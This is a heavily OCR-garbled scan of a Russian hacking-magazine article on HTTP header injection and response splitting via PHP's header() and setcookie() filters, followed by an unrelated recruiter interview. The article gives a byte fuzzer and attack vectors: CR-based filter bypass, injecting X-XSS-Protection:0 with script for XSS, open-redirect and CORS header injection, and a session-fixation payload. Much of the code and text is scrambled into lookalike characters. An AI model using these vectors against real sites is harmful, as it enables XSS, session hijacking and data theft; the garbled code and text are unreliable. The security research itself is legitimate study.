кодированном виде СРЕР выглядит как %0О%0А. Именно в таком 
виде она и используется для проведения классических атак типа 
«расщепление запроса». Эти методы хорошо работали до тех пор, 
пока интерпретаторы не обзавелись функциями фильтрации СРЕР, 
о которых сейчас и пойдет речь. 



ФИЛЬТРАЦИЯ РАЗДЕЛИТЕЛЯ СНГР В РНР 



Функция ЬеасІегО ( ЬіЕІѵ/ѵѵѴЬЬссІ ) широко используется в РНР для 
передачи заголовков в НТТР-ответе сервера. Чаще всего ее при- 
меняют для переадресации пользователей с одной страницы веб- 
приложения на другую. Как видно из документации, начиная с вер- 
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Таблица тестирования браузеров на одиночный разделитель, двойной заголовок длины 
и РеІгезЬ-заголовок 



ОІБСІАІМЕР 



Эта статья не является копией моего доклада на конференции 
2егоМідИІ5, а лишь написана по его мотивам. Помимо материала, 
изложенного во время доклада, в статью также вошло описание 
дальнейших исследований, посвященных фильтрации РНР- 
функций и механизмам работы браузеров с соокіез. Часть 
доклада, касающаяся уязвимостей, связанных с заражением 
кеша, и зтиддііпд-атак, будет изложена в расширенном виде 
в следующих выпусках журнала. 



сии РНР 4.4.2 и 5.1.2 в этой функции осуществляется фильтрация, 
которая предотвращает внедрение заголовков и защищает от атак 
типа «расщепление ответа». Таким образом, начиная с версии РНР 
4.4.2 и 5.1.2, приведенный ниже код не является уязвимым для атак 
типа «внедрение заголовков» и «расщепление ответа»: 

<?рІір 

ІіеасІег("Еоса1;іоп: /Ьазіс/" .$_СЕТ[ ' гесіігесі; ' ] . " .ІтЬтІ"); 

?> 



В результате попытки проведения таких атак будет вызвана 
ошибка типа ѴѴагпіпд, примерно такая: 

1;е5І: . рI^р?xxx=ЬЬЬ%0а%0сINеы-НеасIег: ЫаЫа 



Іліагпіп^: Неасіег шау по1і сопііаіп тоге 1:Ііап а зіп^іе 

I^еасIег^ пеы Ііпе сіе1:ес1:есі . іп 1;е5І:.рІір оп Ипе 2 

Но давай не будем сразу навешивать ярлыки, а разберемся 
в проблеме чуть глубже. Рассмотрим код интерпретатора, который 
выполняет фильтрацию разделителя: 

/* пеы Ііпе заТеІіу сбеск */ 

сЬаг *5 = I^еасIег_1іпе^ *е = Ііеа сІег_1 іпе + ІіеасІег_1іпе_ 

Іеп^ *р; 

(з < е && (р = тетсІіг(5д '\п'^ (е - з)))) { 

і-р (*(р + 1) == ' ' II *(р + 1) == { 

5 = р + 1; 

сопіііпие: 

} 

еТгее(ІіеасІег Ііпе’) ; 

зарі шосіиіе . зарі егг ог ( Е^лIАКNIN^ . "Неасіег шау по1: 

сопііаіп т оге іііап а зіп§1е беасіег^ пеы Ііпе сіеіесіесі. "); 

геіигп РАІЕІІКЕ ; 

} 

Как видно, здесь осуществляется проверка на наличие символа 
ЕР (в ЕІРЕ-кодированном виде выглядит как %0А). При обнаруже- 
нии такого символа, после которого стоит что-то кроме табуля- 
ции (%09) и пробела (%20), вызывается ошибка. Таким образом, 
фильтруется не СРЕР, а только ЕР-байт. Согласно РРС, который мы 
недавно изучили, всё работает безопасно. Но предлагаю не сда- 
ваться так быстро и узнать у браузеров, соблюдают ли они РРС 
в точности? Первым делом можно проверить, как браузеры воспри- 
нимают заголовок с первым пробелом и табуляцией. Для этого на- 
пишем простой РНР-скрипт и проверим его под всеми браузерами: 

<?рІір 

ІіеасІег("Х-Те5І:1:1\г\п 5е1і-соокіе: із1=0К"); 
ІіеасІег("Х-Те5І:2:2\г\п\1:5е1:-соокіе: із2=0К") ; 
есбо "<5сгір1і>а1ег1:(сІоситеп1: . соокіе)</зсгір1:>"; 

?> 



026 



ХАКЕР 03/158/2012 








Расщепляй и властвуй 



Получается, только Іпіегпеі Ехріогег понимает куки в таких 
хидерах. Таким образом, всего-навсего прочитав РРС и просмотрев 
исходники РНР и три строки тестового кода, мы уже выяснили, как 
обойти фильтрацию функции ЬеасІегО для ІЕ, и существенно рас- 
ширили область применения большинства уязвимостей, которые 
раньше классифицировались только как Ореп РесІігесЕ Но не бу- 
дем останавливаться на достигнутом и двинемся дальше. Впереди 
другие браузеры и новые идеи. 



РАЗДЕЛИТЕЛИ ЗАГОЛОВКОВ В СОВРЕМЕННЫХ 
БРАУЗЕРАХ 



Да, чтение исходных кодов РНР и рассуждение с точки зрения 
здравой логики уже дало свои плоды. Мы нашли способ внедрения 
заголовков для браузера Іпіегпеі Ехріогег. Предлагаю не останав- 
ливаться на достигнутом и продолжить начатое исследование, что- 
бы попробовать добиться того же и для других браузеров. 

Итак, исходники РНР говорят о фильтрации %0а (\п или ЕР). 
Предположим, что существуют какие-то байты, которые могут 
служить разделителями заголовков для браузеров. Для проверки 
этого предположения напишем простой фаззер и запустим его под 
различными браузерами. Наиболее важные куски кода фаззера 
приведены ниже: 

#1 /цБг/Ьіп/регІ 

изе 5І;гіс1:; 

изе ыагпіп^з: 

изе Боскеі:: 

Ііз^еп 5ЕКѴЕК. 10: 

ту $апзы = "НТТР/1Л 200 ОК\г\п"; 

-Рог($1=0:$1<256:$1++Н 

$апзы. = "5е1;-соокіе: соок-$і=1" . сІіг($і) ; 

} 

$апзы . = "\п\п\г\п<Іі1>Тез1; зр1і1:1:іп§ Ьу1:ез</Іі1>" ; 



Фаззер очень простой: с его помощью мы выясняем, может 
ли какой-то один байт (подчеркиваю, именно одиночный байт, 
а не дублет) служить разделителем заголовков в браузерах, как 
СРЕР (%0с1%0а). Для этого на сокетах пишем веб-микросервер, 
который на любой НТТР-запрос браузера дает ответ, содержащий 
хидеры 5еІ-соокіе, разделенные каждым из 256 байт по очереди. 
Соответственно, если какой-то байт срабатывает как разделитель, 
появляется новый кукис, если же не срабатывает, то к значению 
текущего кукиса дописывается строка вида «<М>5еІ-соокіе:..». За- 
пускаем скрипт, заходим с помощью браузера, считаем количество 
проставленных куки, смотрим, какие байты сработали, затем про- 
буем следующий браузер. Процедура не очень утомительная, так 
как для тестов мы берем только самые популярные браузеры, кото- 
рых всего пять :-). Тем не менее, рекомендую тебе самостоятельно 
модифицировать фаззер хотя бы для автоматизации подсчета куки 
и поиска разделителей (исходники фаззера ищи на нашем диске). 
Получаются вот такие интересные результаты: 

ІЕ 8/9 %0с1 
РігеТох 7 - 
Орега %0с1 

Сбготе %0с1 %00 (Іззие 95992 бхесі іп геі. 15) 

За-Рагі %0сІ 

Как видно, все браузеры, кроме РігеІ'ох, воспринимают оди- 
ночный СР точно так же, как и всю последовательность СРЕР. 

Вот это уже настоящий результат, благодаря которому можно 
не только выявить уязвимость, но и сделать атаки на ее основе 
по-настоящему кросс-браузерными! Отмечу, что, когда я начинал 
эти изыскания, актуальной была 14-я версия Ооодіе СЬготе, для 
которой также существовал альтернативный байт-разделитеть — 



4г -1^ 4 ^ « Вей 

0. ^ йгиШі: пну ІІпе іЫ 

^ 'ІшІоІ.рЬр од Іік 1 



Работа фильтра функции ЬеасІегО в РНР с 2006 года вызывает такую ошибку 



Іі 

0 СоііІЕІд БШ 1 Н СВ н( «ПІЖШ щ аГйѵ ѴаШаіЭ'Ч>и' ів 

кЛекЗ.рЬр йп ітлі 



Работа фильтра функции зеІсоокіеО по первому аргументу 



А 



Работа фильтра функции зеІсоокіеО по второму аргументу 

і нулл-байт. Информацию об этой уязвимости я отправил произво- 
і дителю. Ей был присвоен номер 95992 и уровень риска Еоѵѵ (это 
і не позволило мне получить вознаграждение за ее обнаружение, 

і что, в общем, справедливо — это ведь скорее баг, чем уязвимость), 

і В итоге в 15-й версии Хрома нулл-байтуже поправили, а к моменту 
I выхода этой статьи, подозреваю, актуальной будет уже 17-я версия 
і браузера. Рігеі'ох же остается на высоте, поскольку реализован 
і в этой части ровно так, как описано в РРС. Следовательно, ни один 
і из найденных нами способов обхода фильтров РНР для него рабо- 
і тать не будет. 



РАСЩЕПЛЯЕМ ОТВЕТ И ПРОВОДИМ Х55 



Настало время воспользоваться найденными в фильтре ошибка- 
ми и проэксплуатировать уязвимости функции ЬеасІегО, то есть 
провести непосредственную атаку. Здесь перед нами встает 
новая проблема — сами браузеры имеют встроенный механизм 
защиты от расщепления ответа. Вот как сложно оказывается 
порой эксплуатировать сііепі-зісіе-уязвимости: сначала борешь- 
ся с фильтрами на серверной стороне, а потом бьешься еще и с 
клиентскими. 

Итак, расщепление ответа главным образом основано на пере- 
даче ложного заголовка СопІепІ-ЕепдіЬ, который должен говорить 
браузеру, сколько байтов содержится в теле НТТР-ответа. Однако 
при вызове ЬеасІегО сам РНР отправляет один заголовок Сопіепі- 
ЕепдіЬ со значением 0, от этого никуда не деться. Таким образом, 
классический НТТР Резропзе Зрііиіпд (расщепление НТТР-ответа) 
работаеттолько тогда, когда браузеры воспринимают второй за- 
головок СопІепІ-ЕепдіЬ как истинно верный. Здесь и начинаются 
проблемы, поскольку ни один современный браузер так не де- 
лает. Тем не менее, можно провести атаку для Іпіегпеі Ехріогег, 
воспользовавшись тем, что этот браузер распознает НТМЕ-код в от- 
вете, даже не читая хидер СопІепІ-ЕепдіЬ. Это более чем странное 
поведение имеет место в браузере с 6-й по 9-ю версию. Пишем 
уязвимый РНР-сценарий: 

<?рІір 

беасІегС'Х-НеасІег : ааа" .$_6ЕТ[ ' г ' ] ) : 

?> 

Затем проводим атаку под Іпіегпеі Ехріогег посредством вот 
такого НТТР-запроса: 
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С0ѴЕІ15Т0КУ 



/ і псі ех . р Іі р ? г =-РооЬ а г%0с1 < І 1 І; т1 >%0с1 < Іі 1 >Т Е 5Т< / Іі 1 > 

Вывод этого скрипта ты сможешь увидеть на соответствую- 
щем скриншоте. На первый взгляд, всё уже хорошо. Однако нас 
блокирует встроенный в браузер Х55-фильтр, когда мы пробуем 
внедрить вот такой сценарий: 

/ і ПСІ ех . р б р ? г =-РооЬ а г%0с1 < 61; т1 >%0с1 < 5 с г і р1; > 
а1ег1;(/5р1і1;1;іп§/)</5Сгір1;> 

Пройти такой путь и не получить желаемого результата, упер- 
шись в какой-то там фильтр, — это не для нас. Вспоминаем, что мы 
можем не только управлять телом ответа сервера, но и внедрять 
заголовки. Ктому же Х55-фильтр Іпіегпеі Ехріогег, несмотря на то 
что он сильно прибавил в сигнатурах по сравнению с 9-й версией 
браузера, всё так же, как и раньше, отключается с помощью специ- 
ального заголовка Х-Х55-Рго1ес1іоп: 0. Ну вот, последний кусочек 
пазла встал на место, и теперь можно проводить полноценную 
атаку. 

Финальный НТТР-запрос к уязвимому сценарию имеет следую- 
щий вид: 

/іпсІех2.р6р?г=-РооЬаг%0сІХ-Х55-Рго1:ес1:іоп:0%0сІ<61:т1>%0сІ 
<5сгір1і>а1ег1:(/х5 5/)</5сгір1:> 



ЧЕРЕЗ ТЕРНИИ к ЗВЕЗДАМ 



Мы начали с чтения РРС, затем заглянули внутрь РНР, потом плав- 
но перешли к изучению механизмов, применяемых браузерами для 
обработки ответа, и вот, наконец, получили важные результаты. 

Мы разобрались с Іпіегпег Ехріогег и рассмотрели внедрение за- 
головков в НТТР-ответ. Сам метод не является частным случаем 
расщепления ответа, так как при его использовании появляется 
только лишний заголовок, а не вторичное тело ответа. А если мы 
не внедряем тело ответа, то и проблем с СопІепМепдіЬ у нас тоже 
не будет, ведь, согласно РРС, протокол НТТР никак не регулирует 
количество заголовков. Теперь предлагаю пойти дальше и присту- 
пить к изучению других потенциально внедряемых заголовков, тем 
более что мы еще не выяснили, как проводить атаку под остальны- 
ми браузерами. 



ВНЕДРЯЕМ ЗАГОЛОВКИ 



Как уже было отмечено выше, заголовки не влияют на Сопіепі- 
ЕепдіЬ, а значит, их можно внедрить в НТТР-ответ для любых 
браузеров. В настоящее время существует немало заголовков для 
управления безопасностью, один из которых, Х-Х55-Рго1ес1іоп, 
управляющий встроенным Х55-фильтром Іпіегпеі Ехріогег, мы уже 



обсудили. Еще один ІЕ'шный заголовок, Х-Соп1еп1-Туре-0р1іоп5, 
предоставляю тебе разобрать самостоятельно. Остальные заголов- 
ки для управления безопасностью поддерживаются всеми браузе- 
рами. Однако запомни как аксиому следующее утверждение: заго- 
ловки перезаписываются (за исключением СопІепІ-ЕепдіЬ). Таким 
образом, беасІепС'ІосаІііоп: /іпсІех.р6р?1ап§=".$_СЕТ['1ап§']) 
дает полноценную уязвимость Ореп Ресіігесі при эксплуатации 
вектора ?Іапд=ааа%0сІЕоса1іоп:Ыір://уапсІех.ги. Как говорится, 
хотите — верьте, хотите — проверьте. Сейчас я не буду перечислять 
все возможные заголовки (прочитать о них ты сможешь на соответ- 
ствующей врезке), а остановлюсь лишь на самых значимых. 

Итак, Ассезз-СопІгоІ-АІІоѵѵ-Огідіп — это заголовок, который 
работает почти под всеми браузерами, кроме Орега, в том числе 
под Іпіегпеі Ехріогег 8+, Рігеіох 3.5+, 5а1агі 4+ и Соодіе СЬготе. Для 
начала советую ознакомиться с первоисточником (пп2І.Іа/45гпѵѵпп). 
Как видно, этотзаголовок можно использовать с дополнительными 
заголовками Ассезз-СопІгоІ-АІІоѵѵ-МеіЬосІз, Ассезз-СопІгоІ-АІІоѵѵ- 
Неасіегз, Ассезз-Сопігоі-Мах-Аде и некоторыми другими (снова 
обрати внимание на приведенную выше ссылку). Назначение этих 
заголовков, думаю, ясно из их названий. Ассезз-СопІгоІ-АІІоѵѵ- 
Огідіп можно использовать как для усиления, так и для ослабления 
безопасности. Всё дело в том, что если этот заголовок не содер- 
жится в ответе, пришедшем от сервера, то доступ через ХНР к со- 
держимому тела такого ответа запрещен. Таким образом, мы можем 
внедрить заголовок «Ассезз-СопІгоІ-АІІоѵѵ-Огідіп: *» и прочитать 
полный ответ со всеми конфиденциальными данными. 



ОСМАТРИВАЕМСЯ 



Итак, мы нашли определенные уязвимости функции ЬеасІегО. На- 
стало время узнать, существуютли какие-нибудь другие функции, 
выполняющие аналогичную фильтрацию. Собственно, в РНР име- 
ется всего три функции, которые занимаются отправкой заголов- 
ков: ЬеасІегО, зеІсоокіеО и зеІгаѵѵсоокіеО. В результате недолгого 
изучения легко выясняется, что две последние функции, так же 
как и ЬеасІегО, уязвимы в аргументах $раіЬ и $сІоппаіп. Уязвимые 
аргументы есть, но их модификация пользователем в приложениях 
встречается довольно редко. Обычно от пользовательских пара- 
метров зависиттолько имя или значение куки, но никак не домен 
и не путь. Поэтому исследование следует продолжить. В имени 
и значении куки выполняется гораздо более строгая фильтрация, 
чем в функции ЬеасІегО: 



і-р (паше && 5І:грЬгк(пате. \1:\г\п\013\014"’) != МІІІП 

{ 

/* шап іззрасе -Рог \013 апсі \014 */ 

іепсІ еггогР Е ІлІАКМІМб. "Соок іе патез сап п о1і сопііаіп 
апѵ о-р 1і6е -Ро 11оыіп^' = . ; \\1: \\г\\п\\013\\ 014"' ); 



ЗАГОЛОВКИ УПРАВЛЕНИЯ БЕЗОПАСНОСТЬЮ 



1. Х-Ргате-ОрІіоп5. Содержит список доменов, 
с которых данный сайт может быть загружен 

в іігате/ігате-контейнер. Для проведения 
атаки можно использовать Х-Ргате-Орііопз: 
аііоѵѵ-ігот аііаскег. 

2. Х-СопІепІ-5есигіІу-РоІісу. Содержит 
список доменов, с которых разрешается 
загрузка содержимого. Скажем, если сервер 
устанавливает в ответе Х-Соп1еп1-5есигі1у- 
Роіісу: аііоѵѵ ’зеІГ, то код <зсгір1 5гс="Ыір://а1- 
1аскег.сот/1.]5"х5сгір1> работать на странице 
не будет. Таким образом, в значении для 
проведения атаки необходимо указывать X- 



Соп1еп1-5есигі1у-РоІісу: аііоѵѵ Ыір://*:80. 

3. КеРгезИ. Старый добрый РеРгезИ. Дает 
внедрение НТМЕ при использовании сіаіа- 
схемы или Ореп-гесіігесі: РеРгезИ: 1,с1а1а:1ех1/ 
Ыт1,<Ы>ОК</Ы>. В таком содержимом СИготе 
фильтрует зсгірі. Но, как бы там ни было, 
сценарий выполняется не в целевом домене, 
а в той самой сіаіа-схеме, что не позволяет 
злоумышленнику провести Х55. 

4. 5еР-соокіе. Его я привожу здесь 
исключительно для полноты. Используя 
этотзаголовок, можно установить заранее 
готовый (то есть известный злоумышленнику) 



идентификатор сессии, а затем просто 
подождать, пока пользователь авторизуется, 
и использовать этотзаголовок для вторичной 
аутентификации. Вектор может выглядеть 
примерно следующим образом: РооЬаг:%0с15е1- 
Соокіе:РНР5Е55т=РАКЕО%Ос11оса1іоп=/ 
аиіИ.рИр. Разумеется, такая схема будет 
работать только в том случае, если веб- 
приложение после авторизации не отправляет 
пользователю новый идентификатор сессии. 
На практике 99 % РНР-приложений уязвимы 
для Беззіоп Ріхаііоп (именно так называется 
эта атака). 
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Расщепляй и властвуй 





ІЕ распознает НТМІ-содержимое даже перед СопІепІ-ІепдІЬ, то есть прямо в заголовках 
геііигп РАІШКЕ; 

І:Р ( ! иг1_епсосІе && ѵаіие && 5І:грЬгк(ѵа1ие^ 

\-Ь\г\п\Ѳ13\Ѳ14") != мин) I 

/* шап І 55расе -Рог \013 а псі \014 */ 

іепсі егг ог( Е_1лIАКNINС^ "С оокіе ѵаіиез са п по1: сопііаіп 

апѵ о-р 1:Ііе -Роііоыіп^ ' . ; \\1:\\г\\п\\013\\014' " V. 

ге-Ригп РАІШКЕ: 

і 

Функция зІгрЬгкО возвращает ложь, если в первом аргументе 
присутствует хотя бы один байт из второго аргумента. Как видно, 
фильтрация имени куки отличается от фильтрации значения только 
одним байтом — символом равенства. Прежде всего мне захотелось 
проверить функцию фильтрации. Она является полным аналогом 
(вернее, прототипом) РНР'шной зІгрЬгк [ рг.р.5иЛипс1іоп5/?5ІгрЬгк ). 
которая оказалась небинарно совместимой. Казалось, это победа, 
но не тут-то было! Дело в том, что сама встроенная в РНР функция 
передачи ответа от сервера также небинарно совместима, то есть 
нулл-байт обрывает строку как раз в том месте, где мы могли бы 
провести внедрение заголовка или тела ответа. В итоге брау- 
зер получает уже укороченную по нулл-байту строку. Дальше 
был фаззинг, много фаззинга. И никаких идей о том, как обойти 
фильтрацию, хотя в старых версиях РНР символ = не обрезается. 
Новые версии не содержат уязвимости (я проверил их все с 2010 
года). 



ОСОБЕННОСТИ С00КІЕ5 



Фаззинг всегда дает какой-то результат, пусть даже не совсем тот, 
на который рассчитываешь изначально. Эксперименты с фильтра- 
цией внутри первых двух аргументов зекоокіеО и зеІгаѵѵсоокіеО 
тоже принесли свои плоды. Я выяснил забавные особенности об- 
работки куки в браузерах и хочу рассказать об этих особенностях 
в статье. Ведь уязвимости вторичны по сравнению стеми метода- 
ми, с помощью которых они были найдены. Как гласит китайская 
народная мудрость, отдашь свою рыбу — накормишь товарища 
на день, научишь его ловить рыбу — накормишь на всю жизнь. 

Но хватит лирики, перейдем непосредственно к результатам. 



БЛОКИРУЮЩАЯ ДЛИНА ЗНАЧЕНИЯ КУКИ 



Если в качестве значения кукису передать больше символов, чем 
поддерживает браузер, кукис не преставится. Я воспользовался 
этой особенностью, когда мне на практике необходимо было до- 
биться того, чтобы такой вот код не ставил куки: 

<?рІір 

5е1;соокіе("рагат0"/'РКЕРІХ_" .$_СЕТ[ ’р0' ] ) ; 

?> 

Для решения этой задачи требуется 4096 символов. Предпо- 
лагается, что лишняя длина обрежется. Однако абсолютно все 
браузеры вообще не ставяттакие кукисы! Следовательно, если 
кукис уже существует, он не перезапишется. Это круто помогло при 
написании сплойта под уязвимость типа Эеззіоп Ріхаііоп. Воттакие 
показатели блокирующей длины значения куки получаются под 
разными браузерами: 



Срабатывание Х55-фильтра в ІЕ 

сілгоше 4096 

5 ^.а г і ^4091 - кЕ N ( с оок іе_п агпе) 

орега 4096 

бге-Рох 4096 

іехріоге 5116-ІЕМ(соокіе_пате) 



ПЕРЕЗАПИСЬ КУКИ ПРИ ПЕРЕПОЛНЕНИИ ЧИСЛА 



Как всегда, лучше начать с чтения РРС: ѵѵѵѵѵѵ.іеи.огд/гк/гІс21 09.1хР 
Особое внимание в этом РРС следует обратить на фразу «аі Іеазі 
20 соокіез рег ипідие Ьозі ог ботаіп пате». Здесь не говорит- 
ся четко, следует ли браузерам хранить 20 куки на хост или 20 
куки на домен. Пусть сами решают. Видимо, в 1997-м году это 
казалось нормальным, но сейчас, когда существуют монстры 
с сотней поддоменов, этот вопрос более чем актуален. 

Итак, когда я прочитал этот РРС, то принялся искать настройки, 
определяющие максимальное количество куки в браузерах, и про- 
верять, распространяются ли эти настройки на поддомены. Вот что 
получилось: 

сілгоше 180 

за-Рагі ~2800/ІЕМ(соокіе_пате+соокіе_ѵа1) 
орега 60 
бге-Рох 149 
іехріоге 49 

Как видно, эти значения не равны 20, но все-таки суще- 
ственно меньше 10000 :-). Что касается поддоменов, то общее 
число куки сохраняется только для Орега и СЬготе, остальные 
ведут отсчет куки отдельно для каждого поддомена. Ситуация 
забавная, потому что можно скинуть куки вышестоящего домена 
с нижнего уровня. А можно... Можно узнать имена куки выше- 
стоящего домена. РоС этого бага для Орега и СЬготе фактиче- 
ски представляет собой общий скоуп ограниченного числа куки. 
Что будет, когда с нижестоящего домена придет (М+1)-й кукис? 

Он перезапишет какой-то кукис из скоупа. Правильно, а ка- 
кой? Самый старый? Нет, в том и прикол, что он выберет кукис 
по алфавиту. Пахнет бинарным поиском? Да, именно так! С по- 
мощью этой штуки мы можем искать имена куки вышестоящего 
домена с нижестоящего под Орега и СЬготе! Но писать код под 
эту задачу муторно и не особенно нужно, ведь в реальной жизни 
значения куки куда важнее, чем их имена, которые, как правило, 
являются статическими. Итак, подведу итог. Оказывается, мож- 
но скидывать куки, если есть возможность проставить много 
своих. Иногда для одного домена, иногда также для поддоменов 
(СЬготе, Орега). 



оитро 



В завершение статьи я бы хотел призвать тебя продолжить мое 
исследование и начать свое, более современное и интересное. 
Надеюсь, мне удалось отразить не только суть различных багов 
типа НТТР Резропзе Эрііиіпд, но и описать сам подход к их поис- 
ку и изучению. А если нет — обещаю найти время и силы, чтобы 
написать новые статьи для журнала. На все вопросы по статье 
и не только с радостью отвечу в своем блоге ( охосі.ги ). Спасибо 
за внимание и до новых встреч! 
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Интервью с ведущим хедхантером рунета 



ИНТЕРВЬЮ с ВЕДУЩИМ 
ХЕДХАНТЕРОМ РУНЕТА 



АЛЕНА 

ВЛАДИМИРСКАЯ 



О РАБОТЕ ХАНТЕРА 



Многие воспринимают хедхантеров как раз- 
датчиков хлеба в блокадном Ленинграде. Все 

думают, что если дружить с нами и знать вол- 
шебный телефончик ведущего хантера в рунете, 
то это как дополнительная пайка хлеба. Ты зна- 
ешь продавщицу, и она вроде как может дать 
тебе дополнительный сухарик. Но на самом 
деле не может. Более того, во время блокады 
за это расстреливали. Знание этого волшебного 
телефона, по сути, ничего не дает. 

Бывают дни, когда у меня «сносят» почту. 

Буквально недавно у меня три дня не работала 
почта, потому что бтаіі счел меня каким-то 
страшным спамером. А случилось это после 
того, как я разместила объявление о том, что 
мы ищем людей для боодіе. :) В результате 
пришлось срочно набирать дополнительных 
сотрудников, потому что мы не успевали раз- 
бирать почту. Письма падали такой лавиной, 
что весь РРІІРРІ сидел и разбирал их неделю. 

Количество откликов очень зависит от самой 
вакансии. В среднем бывает порядка 50-60 
откликов, но доходит и до обвалов. Летом была 
вакансия управляющего в венчурный фонд — 
пришло около 800 откликов за два дня. 

В среднем одну вакансию РРІІРРІ просматри- 
вает от 60 000 до 90 000 человек ежеднев- 
но. То есть я давно уже СМИ. :) 



РРУЕЕІ ЕРІЕМОБИ^Ш 
СОЦИАЛЬНЫЙ ХАНТИНГ 



Хантер не является носителем 
какой-то супертайны и су- 
перэкспертизы. Что до нас 

представлял собой средний 

хантер? Очень дорогой 

костюм, суперджип — все навороты. 

Он приезжал, выкладывал айпадик, 
айфончик и еще 15 молескинчиков 
и говорил клиенту: «Мои услуги стоят 
три оклада кандидата, потому что я об- 
ладаю офигенной экспертизой». 

Мы заявили, что никакой «офигенной 
экспертизы» не существует. На самом деле 
эксперты на рынке — все вы. Для этого мы 
придумали приложение для социальных сетей 
РРІІРРІ Ргіепсіз ( аррз.І'асеЬоок.сопп/ргиІ'Л 



І^гіепсіз ). Каждый из нас является носи- 
телем информации о тех людях, с кото- 
рыми работает. Именно вы, а не хантер 
способны правильно оценить этих 
людей. Вы работаете с ними каждый 
день и точно можете сказать, кто есть 
кто: вот этому товарищу вообще ничего 
нельзя поручать, а вот этот реально 
крутой чувак. 

Хантер обычно знает 
только публичных людей. 

Но большинство технических 
специалистов — люди непублич- 
ные. Рекрутеру очень трудно до них 
добраться, потому что они закрыты 
внутри компаний. К примеру, в мэрии 
работает 800 программистов, но как 
ты до них достучишься? Как добраться 
до того человека, который реально сидит 
и кодит почту каждый день? Это практически 
невозможно. 

Каждый программист знает такого же второ- 
го. Он знает, что вот этот — хороший програм- 
мер, а этот — «сачок» и ничего делать не будет. 
Мы открываем вам вакансии — рекомендуйте 
своих друзей на эти вакансии. Это работа, 
а любая работа должна быть оплачена. Если 
она сделана успешно и мы устроили человека 
по вашей рекомендации, мы вам заплатим. 

То есть клиент перечислил нам деньги 
за хантинг. Мы, не раскрывая клиента, 
рассказали вам о том, что есть такая 
замечательная вакансия. Вы кого-то 
порекомендовали и, если хорошо 
сделали свою работу, получили 
вознаграждение 1000 евро. Это 
кажется нам справедливым. 

Раньше за рекомендации 
никто не платил. Но в результате нашего 
подхода огромный объем данных о спе- 
циалистах, о профессионалах, вышел 
наружу. 

РРІІРРІ первой стала указывать зарпла- 
ты в топовом сегменте рунета. То есть 
буквально: «Эта позиция стоит 400 тысяч 
рублей в месяц. Эта стоит 600 тысяч рублей». 
Через нас люди узнали о величине компенса- 
ций вице-президентов порталов: стало понят- 
но, что топ-менеджеры получают от 700 тысяч 



до 1,5 миллионов рублей в месяц. 

Раз в квартал мы делаем свои обзоры, 
где ставим реальные зарплаты [ ргиНі. 
ги/апаІИіка ). Цифры, которые мы при- 
водим, на 30-40 % выше, чем в анали- 
тике от известных рекрутинговых про- 
ектов. Почему? Объясню на примере. 

Мы знаем, что програм- 
мист на РиЬу не может 
стоить меньше 100 тысяч 
рублей, если он не совсем на- 
чинающий, так как сейчас это 
самое востребованное направ- 
ление. Когда мы видим вакансию 
для РиЬу-программиста за 60 тысяч, 
мы понимаем, что за такие деньги ком- 
пания его не найдет. Однако в обзорах 
зарплат аналитики учитывают занижен- 
ные зарплаты, в результате чего итоговые 
цифры получаются недостоверными. 



ГДЕ РАБОТАТЬ? 



Если вы можете идти работать в рунет — 
идите в рунет! Ни один сектор не будет так 
развиваться, как рунет и ІТ в целом. 

У крупных порталов всегда жуткая нехватка 
людей, особенно технических сотрудников. 

Это богатые компании, и у них нет ограничений 
вроде «в этом году мы возьмем только 20 чело- 
век, и не больше!». Они берут многих и заин- 
тересованы во всех, у кого есть необходимый 
уровень компетенции и адекватность. 

Если вы выбираете, чем заниматься в рунете, 
и у вас хоть немного математический склад 
ума — учитесь программить. Даже если потом 
вы не будете программировать, ценность про- 
дакта (Ргобисі Мападег'а), который в прошлом 
это умел, будет значительно выше — про- 
центов на 30. Почему? Потому, что вы сможете 
договориться с программистами. Например, 
я не смогу с ними договориться — любой 
программер меня обманет. :) Он скажет: «это 
невозможно» или «чтобы это сделать, нужно 
два года» (хотя в реале — три дня), и я ему по- 
верю. Если вы разбираетесь в коде, вам будет 
значительно легче. И вашей команде тоже. 

Рунет долго был закрытой системой, где 
вершиной карьеры была работа в Яндексе. То 
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есть ты шел-шел, и становилось ясно: в конце 
концов тебе нужно прийти в Яндекс, начать 
там работать — и для тебя это будет санаторий. 
Яндекс был чем-то вроде Олимпа! Боги все 
сидели в Яндексе. Они именно с таким рас- 
четом строили свой НР-бренд: все эти гамаки, 
бесплатная еда и прочие бонусы. В коридорах 
там можно встретить Илью Сегаловича. При- 
глашение работать в Яндексе было равносиль- 
но тому, что к тебе спустился Зевс и погладил 
тебя по голове. :) И в Яндексе действительно 
хорошо. Но это давно не единственная воз- 
можная конечная точка карьеры. 

Перестаньте думать в рамках рунета. Интер- 
нет стал международным. В Россию пришли 
все ведущие компании, а кто не пришел, тот 
придет в течение года. Мы искали сотрудников 
для русского РасеЬоок и Соодіе, мы искали 
для Роигздиаге, для ЫпкесІІп и многих других 
компаний. Неважно, придетли компания сама, 
как ЫпкесІІп, или купит какую-то другую ком- 
панию, как это сделал Сгоироп. Присутствие 
будет! Поэтому смотри на мир шире, смотри 
на мировые тренды — это поможет тебе и в 
карьере в том числе. 

Я не считаю, что он разделен на нашу Пре- 
красную Страну и весь остальной ад. Уверена, 
что человеку должно быть интересно работать 
и интересно расти, что он сам волен выбирать. 
Зарплаты (именно в интернет-секторе) у нас 
сейчас сравнимые, а чаще даже выше, чем 
на Западе. Если человеку сейчас интересно по- 
работать в центре игровой индустрии в 2упда — 
это понятно, и это его выбор. И если он уезжает 
по приглашению 2упда, так как компания здесь 
не работает, — это тоже его выбор. 

Не вижу здесь никакого предательства. 

РКУРРІ открыла стартапы как точку 
развития. Но стартапы тоже нужно 
разделять. С точки зрения найма 
мы выделяем две категории стар- 
тапов: с инвестициями до $500 000 
и более $500 000. Но это лишь один 
из критериев. Очень важно объяснить 
молодому человеку, который не всегда 
сам хорошо это понимает, что не нужно 
идти в плохую компанию: там его об- 
манут, ничему не научат 
и вообще будет стресс, 
ад и всё плохо. 

Шансов сейчас много! Ты 

можешь выбирать направления 
для развития. То есть, условно 
говоря, если тебя не взяли в Яндекс 
— это не конец света. Если сейчас 
тебе хочется работать по найму, то 
дальше, возможно, захочется открыть 
свое дело (и если это будет интернет/ІТ, 
мы, опять же, поможем). Потом, если стартап 
будет удачным, ты, возможно, продашь бизнес 
и вернешься к работе по найму, но уже совсем 
на другом уровне. Мы показываем «объемную 
картинку», а для многих людей это очень важно. 



Смотрите на мир с точки зрения «мобиль- 
ности». Доступ к интернету с компьютера 
уходит в прошлое. Он, конечно, и дальше будет 
использоваться для посещения интернет- 
ресурсов, но еще год-два, и компьютер 
перестанет быть основным устройством 
для этого. Такими устройствами ста- 
